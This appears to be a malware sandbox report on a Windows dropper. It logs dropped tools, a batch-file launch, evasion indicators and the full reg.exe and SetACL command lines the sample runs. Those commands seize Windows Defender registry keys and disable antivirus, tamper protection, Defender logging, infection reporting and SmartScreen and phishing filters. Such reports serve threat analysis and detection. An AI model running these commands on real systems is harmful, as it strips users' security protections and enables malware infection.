Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: 3_2_012A88E0 GetLastError,#13,SysStringByteLen,SysAllocStringByteLen,SysFreeString,LoadLibraryExW,LoadLibraryExW,FormatMessageW,LocalFree,FreeLibrary,_com_issue_error,_com_issue_error,3_2_012A88E0
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7128:120:WilError_01
Source: C:\Users\user\Desktop\P196hUN2fw.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nst356E.tmp\do32.bat
Source: SetACL32.exeString found in binary or memory: Type 'SetACL -help' for help.
Source: SetACL32.exeString found in binary or memory: -help
Source: P196hUN2fw.exeStatic file information: File size 3596692 > 1048576
Source: P196hUN2fw.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\Win32\Release\SetACL.pdbI source: SetACL32.exe, 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000003.00000000.398309778.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000000.399019913.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000002.400165246.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000000.400414047.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000002.401125929.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000002.401995733.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000000.401457083.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000000.402317383.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000002.402912531.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000000.403233090.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000002.404159972.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000002.405417159.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000000.404807673.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000000.405628679.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000002.406213773.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe.0.dr
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdbG source: SetACL64.exe.0.dr
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\Win32\Release\SetACL.pdb source: SetACL32.exe, 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000003.00000000.398309778.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000000.399019913.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000002.400165246.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000000.400414047.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000002.401125929.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000002.401995733.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000000.401457083.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000000.402317383.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000002.402912531.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000000.403233090.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000002.404159972.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000002.405417159.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000000.404807673.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000000.405628679.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000002.406213773.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe.0.dr
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdb source: SetACL64.exe.0.dr
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: 3_2_012CB546 push ecx; ret 3_2_012CB559
Source: SetACL64.exe.0.drStatic PE information: section name: _RDATA

Persistence and Installation Behavior

barindex
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Users\user\Desktop\P196hUN2fw.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Users\user\Desktop\P196hUN2fw.exeFile created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeJump to dropped file
Source: C:\Users\user\Desktop\P196hUN2fw.exeFile created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\PowerRun.exeJump to dropped file
Source: C:\Users\user\Desktop\P196hUN2fw.exeFile created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\Desktop\P196hUN2fw.exeFile created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\usibkylp.exeJump to dropped file
Source: C:\Users\user\Desktop\P196hUN2fw.exeFile created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\PowerRun64.exeJump to dropped file
Source: C:\Users\user\Desktop\P196hUN2fw.exeFile created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL64.exeJump to dropped file
Source: C:\Users\user\Desktop\P196hUN2fw.exeFile created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\tpdhmfnkjvlicv.exeJump to dropped file
Source: C:\Users\user\Desktop\P196hUN2fw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\P196hUN2fw.exe TID: 7100Thread sleep count: 334 > 30Jump to behavior
Source: C:\Users\user\Desktop\P196hUN2fw.exe TID: 7100Thread sleep time: -33400s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_3-16929
Source: C:\Users\user\Desktop\P196hUN2fw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nst356E.tmp\PowerRun.exeJump to dropped file
Source: C:\Users\user\Desktop\P196hUN2fw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nst356E.tmp\usibkylp.exeJump to dropped file
Source: C:\Users\user\Desktop\P196hUN2fw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nst356E.tmp\PowerRun64.exeJump to dropped file
Source: C:\Users\user\Desktop\P196hUN2fw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL64.exeJump to dropped file
Source: C:\Users\user\Desktop\P196hUN2fw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nst356E.tmp\tpdhmfnkjvlicv.exeJump to dropped file
Source: C:\Users\user\Desktop\P196hUN2fw.exeCode function: 0_2_00406268 FindFirstFileA,FindClose,0_2_00406268
Source: C:\Users\user\Desktop\P196hUN2fw.exeCode function: 0_2_0040572D GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040572D
Source: C:\Users\user\Desktop\P196hUN2fw.exeCode function: 0_2_004026F8 FindFirstFileA,0_2_004026F8
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: 3_2_012C4900 FindFirstFileW,GetLastError,3_2_012C4900
Source: C:\Users\user\Desktop\P196hUN2fw.exeAPI call chain: ExitProcess graph end nodegraph_0-3010
Source: SetACL32.exe, 00000006.00000002.401856826.00000000006F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
Source: SetACL32.exe, 00000003.00000002.398725443.0000000001127000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?
Source: SetACL32.exe, 00000004.00000002.400073062.0000000001037000.00000004.00000020.00020000.00000000.sdmp, SetACL32.exe, 00000005.00000002.400929497.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, SetACL32.exe, 00000007.00000002.402713224.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, SetACL32.exe, 00000008.00000002.403821967.0000000000767000.00000004.00000020.00020000.00000000.sdmp, SetACL32.exe, 00000009.00000002.405279132.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, SetACL32.exe, 0000000A.00000002.406288922.0000000001458000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: 3_2_012CF1A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_012CF1A3
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: 3_2_012DCB4E mov eax, dword ptr fs:[00000030h]3_2_012DCB4E
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: 3_2_012D6588 mov eax, dword ptr fs:[00000030h]3_2_012D6588
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: 3_2_012DCB92 mov eax, dword ptr fs:[00000030h]3_2_012DCB92
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: 3_2_012CF1A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_012CF1A3
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: 3_2_012CB715 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_012CB715
Source: C:\Users\user\Desktop\P196hUN2fw.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nst356E.tmp\do32.batJump to behavior
Source: C:\Users\user\Desktop\P196hUN2fw.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
